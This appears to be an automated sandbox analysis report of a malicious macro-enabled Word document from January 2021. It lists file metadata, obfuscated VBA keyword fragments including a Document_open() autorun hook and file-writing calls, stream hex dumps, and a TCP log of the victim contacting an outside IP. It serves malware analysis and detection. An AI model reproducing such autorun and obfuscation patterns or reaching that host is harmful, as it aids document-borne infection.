                                            Contains Workbook/Book Stream:False
                                            Contains PowerPoint Document Stream:False
                                            Contains Visio Document Stream:False
                                            Contains ObjectPool Stream:
                                            Flash Objects Count:
                                            Contains VBA Macros:True

                                            Summary

                                            Code Page:1252
                                            Title:
                                            Subject:National JSON parsing Checking Account overriding metrics Shoes Handcrafted Rubber Chair cross-media
                                            Author:Laura David
                                            Keywords:
                                            Comments:
                                            Template:Normal.dotm
                                            Last Saved By:Lisa Moulin
                                            Revion Number:1
                                            Total Edit Time:0
                                            Create Time:2021-01-05 06:14:00
                                            Last Saved Time:2021-01-05 06:14:00
                                            Number of Pages:1
                                            Number of Words:3222
                                            Number of Characters:18371
                                            Creating Application:Microsoft Office Word
                                            Security:8

                                            Document Summary

                                            Document Code Page:-535
                                            Number of Lines:153
                                            Number of Paragraphs:43
                                            Thumbnail Scaling Desired:False
                                            Company:
                                            Contains Dirty Links:False
                                            Shared Document:False
                                            Changed Hyperlinks:False
                                            Application Version:917504

                                            Streams with VBA

                                            VBA File Name: Oi5oelv0_s4, Stream Size: 17886
                                            General
                                            Stream Path:Macros/VBA/Oi5oelv0_s4
                                            VBA File Name:Oi5oelv0_s4
                                            Stream Size:17886
                                            Data ASCII:. . . . . . . . . | . . . . . . . . . . . . . . . . . . . . 0 . . . . . . . . . . . . [ k . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                            Data Raw:01 16 01 00 00 f0 00 00 00 7c 06 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 83 06 00 00 93 30 00 00 00 00 00 00 01 00 00 00 ae c5 5b 6b 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                            VBA Code Keywords

                                            Keyword
                                            DyjPBI
                                            dLrgANHCG
                                            EajdMLeD
                                            rgBSB
                                            Object
                                            yjNpyrf
                                            rJqMZII
                                            PGiog
                                            T_dehutl_mggmhizd
                                            EUMDPGt
                                            xkJxAAC
                                            AybxtEBCJ.Close
                                            JhiYfXc:
                                            VusSK
                                            "fUwLgjVtQyH"
                                            UUoAB.CreateTextFile("XFtOCOULb:\dMKcFHF\GAGPCEp.ZPnnAM")
                                            bGnhXCA
                                            VJbwzTDT.Close
                                            VwnpBElhO
                                            MMAqSI
                                            UPhhYZEF
                                            "bVawaPADALVlWFFA"
                                            NFWzF
                                            "HiTyACJmCuGQFFJ"
                                            sGvJJWh
                                            PmBxcD:
                                            SfMKIOk
                                            "TthascRlxHZH"
                                            AybxtEBCJ:
                                            SFmrEDJ
                                            zOBhOx
                                            fUGQf
                                            numuq
                                            rEeiBJ
                                            ChWZVJiB.CreateTextFile("gMEpHB:\SKWvYCA\YtZqA.fQoAE")
                                            RkPWCDPC
                                            JADCpjk
                                            PmBxcD
                                            pDPzBJmM
                                            bGMXEIA.CreateTextFile("grPSDMS:\lQkJoR\aZMUgjGC.pVvhaH")
                                            WSARpB
                                            EUMDPGt.Close
                                            HnBvAEH
                                            "WXovaGHxqSlUt"
                                            QEIFFM
                                            bPFNuJ.WriteLine
                                            "PzrrnIFtpmxAx"
                                            EUMDPGt:
                                            ilONFzHG
                                            "akTuJaIGmZrUyF"
                                            qpOWEIHHA
                                            yJouG
                                            XwZxsHCGt
                                            FTalMbF
                                            XDJPUW
                                            "ALpzEMcwuWl"
                                            gQxBD:
                                            UUoAB
                                            tcYiEMeRH.Close
                                            nIHrI
                                            eUdbDAHHs.WriteLine
                                            "uJnfBHIPFKBxHBmEE"
                                            FPWaF
                                            JADCpjk.WriteLine
                                            xxYeFGUAH
                                            rfDgD
                                            njKwJdA.WriteLine
                                            "bOOXnOJYtbRAbm"
                                            VJbwzTDT:
                                            RkPWCDPC:
                                            UPhhYZEF.Close
                                            eWkHqVao
                                            Resume
                                            XKPUEfhk
                                            RLurCDDF
                                            gglHam
                                            "budRDJKVnJRU"
                                            DRrKpoA
                                            "]an"
                                            lgZgGO
                                            "gcZaHCGUVJsFmL"
                                            "yKdJWHAniqHFCB"
                                            ThHBBDu
                                            tcYiEMeRH.WriteLine
                                            waSbS
                                            VfJHAA
                                            vutdEkdRL
                                            NSiRQzd
                                            "frvvJFHIkftmZHE"
                                            OtQPAJH
                                            AybxtEBCJ.WriteLine
                                            XTdPHz
                                            OBwIBy:
                                            JADCpjk.Close
                                            QZjuH
                                            "DkRmTYGAMxqHI"
                                            zOQlGPVC
                                            "dWnMFoTBPDqeJK"
                                            jPnRGLC
                                            CbMZSLFAM
                                            kboRA
                                            ORIzFDySE
                                            DRrKpoA.Close
                                            VAEDpBCV
                                            uJSEDH:
                                            QZjuH.CreateTextFile("EEGvGuF:\XrXnHGDDB\noadJZ.yGcKj")
                                            "bAurYaGPwGKRiG"
                                            bPFNuJ
                                            "koDuGqAOJBlLgZIEme"
                                            DyjPBI.CreateTextFile("OPLPBI:\fNyAExIq\jrtno.FyobBAAFE")
                                            hiZkEEF.WriteLine
                                            txKQv
                                            xCaTC.CreateTextFile("Oafyb:\RPNGMA\cmOgEyD.EEpGjE")
                                            vtDUw
                                            RkPWCDPC.WriteLine
                                            aLGptGA
                                            "kWzGMzIVefGB"
                                            "ncDMUIadusSIDx"
                                            VB_Name
                                            RkPWCDPC.Close
                                            "JCgblEAJizSfW"
                                            uJSEDH
                                            eUdbDAHHs.Close
                                            "HfXAPQQbXKJHFGu"
                                            eBddHTXP
                                            AybxtEBCJ
                                            OBwIBy
                                            RNgUODjsM.CreateTextFile("FyNFG:\ugXUH\cZIFypIHj.tRULIINC")
                                            VJbwzTDT.WriteLine
                                            ItSfCDCB
                                            Mid(Application.Name,
                                            JhiYfXc.Close
                                            PAxhJ
                                            "TJahKRWdrvHFIy"
                                            xOnWA
                                            xkJxAAC.CreateTextFile("tLvao:\aGKUA\AhQhj.BDOQSJWG")
                                            "lRcGHADAHrlHJJA"
                                            oOysMtDG
                                            syDRd
                                            dLrgANHCG.CreateTextFile("lBasV:\tFGoGJd\zBuHfBCN.AHGggII")
                                            cTfCJ
                                            hiZkEEF
                                            "GhifcDKlpA"
                                            oOysMtDG.WriteLine
                                            FgmzCEm
                                            bPFNuJ:
                                            "HwixyOCYxmojd"
                                            UMzHfyAfA
                                            oOysMtDG:
                                            "eSpcpGDZncccrFb"
                                            oMcHDXEF
                                            reTrs
                                            "BWSOKPyHMnSQxi"
                                            EJEApM
                                            JADCpjk:
                                            XjhOHEMDC
                                            gQxBD
                                            "xtsHGQjpNzDIYJ"
                                            pSFXACJ
                                            wUoJIFDD
                                            HOkLRDGd
                                            njKwJdA.Close
                                            RvFOAEPH
                                            HMyHCQCGu
                                            njKwJdA
                                            "GqMIEnOQFEEDsE"
                                            bGMXEIA
                                            eUdbDAHHs:
                                            rtGyqOth
                                            wuKBFvqI
                                            hSbDPCC
                                            hSbDPCC.CreateTextFile("pygNv:\znIpFIR\yniMs.nmiIGDEDA")
                                            rEeiBJ.CreateTextFile("VxskFWpm:\cuyOFYrFJ\SZSlaGJZi.TeBYCDZ")
                                            cSHkDL
                                            blQEM
                                            nKtfECko
                                            RUMGE
                                            Zpeehqbjjey.Create
                                            uJSEDH.WriteLine
                                            xNJyUCNg
                                            "BQumCJmmiAGIKv"
                                            yyoqEHETu
                                            GNnZJzE
                                            HnBvAEH.CreateTextFile("ehLoAm:\PAVZiAGU\jVPHv.fAgoFBYmC")
                                            yUWxTlVAC
                                            TxAVq
                                            EVOuqJnGD
                                            "cnLcFxEphoEbAFA"
                                            CksLJVJ
                                            PmBxcD.Close
                                            njKwJdA:
                                            XsKjcKE
                                            "GDTGdEJpuRnDBFQ"
                                            "ZRotGHIxyrpSqvsXCC"
                                            SOunIGkF
                                            "]anw["
                                            JhiYfXc
                                            ChWZVJiB
                                            lEOlGYxK.CreateTextFile("sojcFeJ:\zxDxYHq\rNbtS.PtHuEEP")
                                            "OnehVAaWbfCAcAjsG"
                                            iytziJ
                                            "ohaTGaUTSwwDv"
                                            "qMnfwCwbPJC"
                                            "vRrzDEngIQvFPJfE"
                                            zgBjJOGEH
                                            tcYiEMeRH:
                                            OBwIBy.Close
                                            NtpdEJDH
                                            gQxBD.WriteLine
                                            "WMwcBSqFohy"
                                            EUMDPGt.WriteLine
                                            gQxBD.Close
                                            PAxhJ.CreateTextFile("dFVzNBE:\EBCOlEEOJ\KlKcJKk.SVIvoAEqG")
                                            QrVtQr
                                            VJbwzTDT
                                            UPhhYZEF.WriteLine
                                            uJSEDH.Close
                                            Zpeehqbjjey
                                            RNgUODjsM
                                            NBjEFGnEA
                                            oOysMtDG.Close
                                            YzIkA
                                            tcYiEMeRH
                                            xxYeFGUAH.CreateTextFile("eCzvxHN:\cgVnKGAT\YcnDi.YqiJOp")
                                            "TOSxJaIzCudpDlB"
                                            fUDmDCt
                                            "utFMeJhUKJhJ"
                                            aTfPCap
                                            "SjDfYFUFPynYGu"
                                            wCjuwBBGN
                                            JHrNWdBsW
                                            bPFNuJ.Close
                                            XwZxsHCGt.CreateTextFile("TNJvoD:\walkrfAE\EalrWFWTE.wDSOEJ")
                                            "rVpvDaGGxNfeNUF"
                                            hiZkEEF.Close
                                            Nothing
                                            UPhhYZEF:
                                            IYKcgC
                                            dTtuVsDVA
                                            VcIiQJFi
                                            JhiYfXc.WriteLine
                                            "jVSXGfhYCxoHFD"
                                            lEOlGYxK
                                            "ozrZBTZBTMMIBB"
                                            hiZkEEF:
                                            "goMgGBdJMUDLAG"
                                            WtNcAKUFt
                                            "MvkIFCHFTnRqD"
                                            PmBxcD.WriteLine
                                            rgBSB.CreateTextFile("PkeJHBJJH:\ODJMGCw\NefpJHvCX.XzgyeCQuA")
                                            SynsDAgHG
                                            "PFQdBLHsDnfTZv"
                                            vitXEH
                                            "OTLmJCwhyQMFzlB"
                                            oUWfJGBeE
                                            "OcgtIFEeoIFhxt"
                                            Error
                                            "lHuxHADjraNFBgI"
                                            CCnbXRBeA
                                            AiICOj
                                            VcIiQJFi.CreateTextFile("gNgYGZ:\CatdBMGGg\qGsdAdOQH.cJsxtdJE")
                                            CmcBTTABc
                                            Attribute
                                            CHKzNBD
                                            TFXNGIiH
                                            "cGDcNrWsPeGCDF"
                                            LVadAF
                                            mmkTuwH
                                            eUdbDAHHs
                                            Function
                                            VbMBBgf
                                            MfgnKGWI
                                            ukrnIFCE
                                            EbuwEJS
                                            WxujBIAMz
                                            DRrKpoA:
                                            "dvqIBFEqwfkI"
                                            kskMAAHA
                                            OBwIBy.WriteLine
                                            xCaTC
                                            zLkRiC
                                            DRrKpoA.WriteLine
                                            "dxIGdcCHBKYgde"
                                            VBA Code
                                            VBA File Name: Qafkrimwsho, Stream Size: 697
                                            General
                                            Stream Path:Macros/VBA/Qafkrimwsho
                                            VBA File Name:Qafkrimwsho
                                            Stream Size:697
                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                            Data Raw:01 16 01 00 00 f0 00 00 00 1c 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 23 02 00 00 83 02 00 00 00 00 00 00 01 00 00 00 ae c5 45 f2 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                            VBA Code Keywords

                                            Keyword
                                            Attribute
                                            VB_Name
                                            "Qafkrimwsho"
                                            VBA Code
                                            VBA File Name: Wm_t404p8v_, Stream Size: 1106
                                            General
                                            Stream Path:Macros/VBA/Wm_t404p8v_
                                            VBA File Name:Wm_t404p8v_
                                            Stream Size:1106
                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . u . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                            Data Raw:01 16 01 00 00 f0 00 00 00 de 02 00 00 d4 00 00 00 da 01 00 00 ff ff ff ff e5 02 00 00 75 03 00 00 00 00 00 00 01 00 00 00 ae c5 f3 f6 00 00 ff ff a3 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                            VBA Code Keywords

                                            Keyword
                                            False
                                            Private
                                            VB_Exposed
                                            Attribute
                                            VB_Creatable
                                            VB_Name
                                            Document_open()
                                            VB_PredeclaredId
                                            VB_GlobalNameSpace
                                            VB_Base
                                            VB_Customizable
                                            VB_TemplateDerived
                                            VBA Code

                                            Streams

                                            Stream Path: \x1CompObj, File Type: data, Stream Size: 146
                                            General
                                            Stream Path:\x1CompObj
                                            File Type:data
                                            Stream Size:146
                                            Entropy:4.00187355764
                                            Base64 Encoded:False
                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . . 9 . q @ . . . . . > . : . C . < . 5 . = . B . . M . i . c . r . o . s . o . f . t . . W . o . r . d . . 9 . 7 . - . 2 . 0 . 0 . 3 . . . . . . . . . . .
                                            Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 00 00 00 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f 63 00 10 00 00 00 57 6f 72 64 2e 44 6f 63 75 6d 65 6e 74 2e 38 00 f4 39 b2 71 40 00 00 00 14 04 3e 04 3a 04 43 04 3c 04 35 04 3d 04 42 04 20 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 57 00 6f 00 72 00 64 00 20 00 39 00 37 00 2d 00
                                            Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                            General
                                            Stream Path:\x5DocumentSummaryInformation
                                            File Type:data
                                            Stream Size:4096
                                            Entropy:0.279952994103
                                            Base64 Encoded:False
                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . h . . . . . . . p . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + . . . . . . . . T . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                            Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 f4 00 00 00 0c 00 00 00 01 00 00 00 68 00 00 00 0f 00 00 00 70 00 00 00 05 00 00 00 7c 00 00 00 06 00 00 00 84 00 00 00 11 00 00 00 8c 00 00 00 17 00 00 00 94 00 00 00 0b 00 00 00 9c 00 00 00 10 00 00 00 a4 00 00 00 13 00 00 00 ac 00 00 00
                                            Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 520
                                            General
                                            Stream Path:\x5SummaryInformation
                                            File Type:data
                                            Stream Size:520
                                            Entropy:4.06136102648
                                            Base64 Encoded:False
                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . h . . . . . . . T . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . . . 0 . . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . N o r m a l . d o t m .
                                            Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 d8 01 00 00 11 00 00 00 01 00 00 00 90 00 00 00 02 00 00 00 98 00 00 00 03 00 00 00 68 01 00 00 04 00 00 00 54 01 00 00 05 00 00 00 a4 00 00 00 06 00 00 00 b0 00 00 00 07 00 00 00 bc 00 00 00 08 00 00 00 40 01 00 00 09 00 00 00 d0 00 00 00
                                            Stream Path: 1Table, File Type: data, Stream Size: 6424
                                            General
                                            Stream Path:1Table
                                            File Type:data
                                            Stream Size:6424
                                            Entropy:6.13606471955
                                            Base64 Encoded:True
                                            Data ASCII:j . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . > . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . .
                                            Data Raw:6a 04 11 00 12 00 01 00 0b 01 0f 00 07 00 03 00 03 00 03 00 00 00 04 00 08 00 00 00 98 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00
                                            Stream Path: Data, File Type: data, Stream Size: 99189
                                            General
                                            Stream Path:Data
                                            File Type:data
                                            Stream Size:99189
                                            Entropy:7.39018675385
                                            Base64 Encoded:True
                                            Data ASCII:u . . . D . d . . . . . . . . . . . . . . . . . . . . . / g . , b . r . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . j . . . . . . . . . . . . . . . . . . . c . . . 8 . . . . A . . . . ? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . A . C . = . > . : . . 1 . . . . . " . . . . . . . . . . . . . . . . . . . . . . . R . . . . . . . . . { . . B g . . . m d . z . M . . . . . . . . . . . . D . . . . . . . . F . . . . . . { . . B g . . . m d . z . M . . . . . . . .
                                            Data Raw:75 83 01 00 44 00 64 00 00 00 00 00 00 00 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 2f 67 eb 2c 62 01 72 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 04 f0 6a 00 00 00 b2 04 0a f0 08 00 00 00 01 04 00 00 00 0a 00 00 63 00 0b f0 38 00 00 00 04 41 01 00 00 00 3f 01 00 00 06 00 bf 01 00 00 10 00 ff 01 00 00 08 00 80 c3 14 00
                                            Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 488
                                            General
                                            Stream Path:Macros/PROJECT
                                            File Type:ASCII text, with CRLF line terminators
                                            Stream Size:488
                                            Entropy:5.44671163464
                                            Base64 Encoded:True
                                            Data ASCII:I D = " { 3 2 8 4 0 4 E F - 4 1 6 C - 4 D E 8 - 9 A 4 2 - 2 0 1 5 6 D 2 2 2 C 2 6 } " . . D o c u m e n t = W m _ t 4 0 4 p 8 v _ / & H 0 0 0 0 0 0 0 0 . . M o d u l e = Q a f k r i m w s h o . . M o d u l e = O i 5 o e l v 0 _ s 4 . . E x e N a m e 3 2 = " T j 8 d t f s u o p d k " . . N a m e = " m w " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 1 0 1 2 B 2 B 0 B 6 B 0 B 6 B 0 B 6 B 0 B 6 " . . D P B = " 8 2 8 0 2 0 5 0 9 3 5 1 9 3
                                            Data Raw:49 44 3d 22 7b 33 32 38 34 30 34 45 46 2d 34 31 36 43 2d 34 44 45 38 2d 39 41 34 32 2d 32 30 31 35 36 44 32 32 32 43 32 36 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 57 6d 5f 74 34 30 34 70 38 76 5f 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 51 61 66 6b 72 69 6d 77 73 68 6f 0d 0a 4d 6f 64 75 6c 65 3d 4f 69 35 6f 65 6c 76 30 5f 73 34 0d 0a 45 78 65 4e 61 6d 65 33 32 3d
                                            Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 110
                                            General
                                            Stream Path:Macros/PROJECTwm
                                            File Type:data
                                            Stream Size:110
                                            Entropy:3.60650024781
                                            Base64 Encoded:False
                                            Data ASCII:W m _ t 4 0 4 p 8 v _ . W . m . _ . t . 4 . 0 . 4 . p . 8 . v . _ . . . Q a f k r i m w s h o . Q . a . f . k . r . i . m . w . s . h . o . . . O i 5 o e l v 0 _ s 4 . O . i . 5 . o . e . l . v . 0 . _ . s . 4 . . . . .
                                            Data Raw:57 6d 5f 74 34 30 34 70 38 76 5f 00 57 00 6d 00 5f 00 74 00 34 00 30 00 34 00 70 00 38 00 76 00 5f 00 00 00 51 61 66 6b 72 69 6d 77 73 68 6f 00 51 00 61 00 66 00 6b 00 72 00 69 00 6d 00 77 00 73 00 68 00 6f 00 00 00 4f 69 35 6f 65 6c 76 30 5f 73 34 00 4f 00 69 00 35 00 6f 00 65 00 6c 00 76 00 30 00 5f 00 73 00 34 00 00 00 00 00
                                            Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 5146
                                            General
                                            Stream Path:Macros/VBA/_VBA_PROJECT
                                            File Type:data
                                            Stream Size:5146
                                            Entropy:5.51240945881
                                            Base64 Encoded:False
                                            Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 1 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F .
                                            Data Raw:cc 61 97 00 00 01 00 ff 09 04 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 31 00 23 00
                                            Stream Path: Macros/VBA/dir, File Type: data, Stream Size: 630
                                            General
                                            Stream Path:Macros/VBA/dir
                                            File Type:data
                                            Stream Size:630
                                            Entropy:6.3062184781
                                            Base64 Encoded:True
                                            Data ASCII:. r . . . . . . . . . . 0 * . . . . . p . . H . . " . . d . . . . . m . . 2 . 4 . . @ . . . . . Z = . . . . b . . . . . . . . . . . . a . . . % . J < . . . . . r s t d o l e > . 2 s . . t . d . o . l . . e . . . h . % ^ . . . * \\ G { 0 0 0 2 ` 0 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } . # 2 . 0 # 0 # C . : \\ W i n d o w . s \\ S y s W O W . 6 4 \\ . e 2 . t l . b # O L E A u . t o m a t i o n . . ` . . . . N o r m a . l . E N . C r . m . . a . F . . . . . . . . * \\ C . . . . . . . . a . . . ! O f f i
                                            Data Raw:01 72 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 22 02 00 64 e4 04 04 02 1c 6d a2 a2 32 00 34 00 00 40 02 14 06 02 14 5a 3d 02 0a 07 02 62 01 14 08 06 12 09 01 02 12 08 e2 e3 61 06 00 0c 25 02 4a 3c 02 0a 16 00 01 72 73 74 20 64 6f 6c 65 3e 02 32 73 00 00 74 00 64 00 6f 00 6c 00 a0 65 00 0d 00 68 00 25 5e 00 03 00 2a 5c 47 7b 30 30 30 32 60 30 34 33 30 2d
                                            Stream Path: WordDocument, File Type: data, Stream Size: 25134
                                            General
                                            Stream Path:WordDocument
                                            File Type:data
                                            Stream Size:25134
                                            Entropy:3.92042329439
                                            Base64 Encoded:False
                                            Data ASCII:. . . . _ . . . . . . . . . . . . . . . . . . . . . . . Y \\ . . . . b j b j . . . . . . . . . . . . . . . . . . . . . . . . . . . b . . b . . . b . . . Y T . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . F . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                            Data Raw:ec a5 c1 00 5f c0 09 04 00 00 f8 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 08 00 00 59 5c 00 00 0e 00 62 6a 62 6a 00 15 00 15 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 04 16 00 2e 62 00 00 62 7f 00 00 62 7f 00 00 59 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00

                                            Network Behavior

                                            Network Port Distribution

                                            TCP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Jan 6, 2021 08:57:41.249049902 CET4916780192.168.2.22176.53.69.151
                                            Jan 6, 2021 08:57:41.322602034 CET8049167176.53.69.151192.168.2.22
                                            Jan 6, 2021 08:57:41.322690010 CET4916780192.168.2.22176.53.69.151
                                            Jan 6, 2021 08:57:41.325428963 CET4916780192.168.2.22176.53.69.151
                                            Jan 6, 2021 08:57:41.428926945 CET8049167176.53.69.151192.168.2.22
                                            Jan 6, 2021 08:57:41.428961039 CET8049167176.53.69.151192.168.2.22
                                            Jan 6, 2021 08:57:41.428980112 CET8049167176.53.69.151192.168.2.22
                                            Jan 6, 2021 08:57:41.428996086 CET8049167176.53.69.151192.168.2.22
                                            Jan 6, 2021 08:57:41.429013014 CET8049167176.53.69.151192.168.2.22
                                            Jan 6, 2021 08:57:41.429024935 CET4916780192.168.2.22176.53.69.151
                                            Jan 6, 2021 08:57:41.429029942 CET8049167176.53.69.151192.168.2.22
                                            Jan 6, 2021 08:57:41.429040909 CET4916780192.168.2.22176.53.69.151
                                            Jan 6, 2021 08:57:41.429047108 CET8049167176.53.69.151192.168.2.22
                                            Jan 6, 2021 08:57:41.429064035 CET8049167176.53.69.151192.168.2.22
                                            Jan 6, 2021 08:57:41.429068089 CET4916780192.168.2.22176.53.69.151
                                            Jan 6, 2021 08:57:41.429080963 CET8049167176.53.69.151192.168.2.22
                                            Jan 6, 2021 08:57:41.429095984 CET4916780192.168.2.22176.53.69.151
                                            Jan 6, 2021 08:57:41.429100990 CET8049167176.53.69.151192.168.2.22
                                            Jan 6, 2021 08:57:41.429132938 CET4916780192.168.2.22176.53.69.151
                                            Jan 6, 2021 08:57:41.503504038 CET8049167176.53.69.151192.168.2.22
                                            Jan 6, 2021 08:57:41.503540993 CET8049167176.53.69.151192.168.2.22
                                            Jan 6, 2021 08:57:41.503559113 CET8049167176.53.69.151192.168.2.22
                                            Jan 6, 2021 08:57:41.503576040 CET8049167176.53.69.151192.168.2.22
                                            Jan 6, 2021 08:57:41.503592968 CET8049167176.53.69.151192.168.2.22
                                            Jan 6, 2021 08:57:41.503607988 CET8049167176.53.69.151192.168.2.22
